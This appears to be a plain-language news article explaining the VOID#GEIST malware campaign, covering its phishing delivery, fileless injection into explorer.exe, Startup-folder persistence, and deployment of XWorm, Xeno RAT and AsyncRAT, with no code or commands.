Cybersecurity experts have uncovered a clever and dangerous new way that hackers are breaking into computers to steal data. This specific campaign, which researchers have named VOID#GEIST, is particularly scary because it doesn’t use the typical “virus” files that most antivirus software is trained to catch. Instead, it hides inside simple-looking command scripts and legitimate software tools to sneak past your defenses. Once it gets inside, it delivers a triple threat of “Remote Access Trojans” known as XWorm, AsyncRAT, and Xeno RAT. These tools basically give a hacker a remote control for your entire digital life.

How the Trap is Set

The attack usually starts with a simple trick: a phishing email. When a user clicks on a link or opens an attachment, a batch script—a simple list of commands for Windows—is pulled down from the internet. The hackers are using a service called TryCloudflare to host their malicious files, making the web traffic look like it’s coming from a trusted source.

What makes VOID#GEIST so sneaky is that it doesn’t try to “hack” the system by forcing its way into restricted folders. Instead, it just uses the normal permissions of the person currently logged in. It stays quiet, blending in with regular office work. To keep the victim from noticing anything is wrong, the script opens Google Chrome in full-screen mode and displays a fake PDF, like an invoice or a bill. While the user is busy looking at the document, the malware is running in the background, hidden from view.

Hiding in Plain Sight Using “Fileless” Tricks

Instead of saving big, suspicious files onto your hard drive, VOID#GEIST uses a “fileless” approach. This means the actual malicious code lives only in the computer’s memory (RAM). The researchers found that the hackers use a trick called Early Bird APC Injection. They basically hijack a standard Windows process—specifically “explorer.exe,” which is the part of Windows that handles your desktop and folders—and force it to run their hidden code.

To make sure they don’t lose access if the computer restarts, the malware places a small script in the Windows “Startup” folder. This is a very “low-key” way to stay on the machine. It doesn’t change any deep system settings or trigger the loud alarms that most security programs would sound if a program tried to gain “Admin” rights. It just waits for the user to log back in and then starts the whole process over again.

The Python Payload and the Triple Threat

One of the most interesting parts of this attack is how it uses legitimate tools to do its dirty work. The malware actually downloads a real, working version of the Python programming language directly from the official website. By bringing its own “engine” along, the malware doesn’t care if your computer is old or missing certain software; it creates its own little environment where it can run perfectly.

Inside this environment, a script called “runn.py” goes to work. It takes encrypted files (which just look like gibberish to security scanners) and turns them into active malware. The attack happens in stages, slowly unfolding like a Russian nesting doll:

• First, it launches XWorm, a versatile tool used for stealing passwords and taking screenshots.

• Next, it uses a real Microsoft file called “AppInstallerPythonRedirector.exe” to help launch Xeno RAT.

• Finally, it deploys AsyncRAT, which allows the hackers to monitor everything the victim does in real-time.

By the time the process is finished, the hackers have three different ways to control the computer. They even send a “ping” back to their home base to let them know the infection was successful. Because the attack is broken up into so many small, harmless-looking steps, it is incredibly difficult for traditional security tools to see the big picture until it is far too late.